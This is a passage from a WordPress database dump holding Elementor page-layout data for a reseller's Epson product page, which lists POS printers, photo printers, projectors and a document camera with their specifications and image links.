PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-6\",\"right\":\"-6\",\"bottom\":\"-6\",\"left\":\"-6\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8068,3496,'_elementor_version','2.5.14'),(8662,3664,'_wp_attached_file','2019/10/Dell-PNG.png'),(8071,3497,'_wp_page_template','template-fullwidth.php'),(8072,3497,'_elementor_edit_mode','builder'),(8073,3497,'_elementor_template_type','post'),(8074,3497,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" 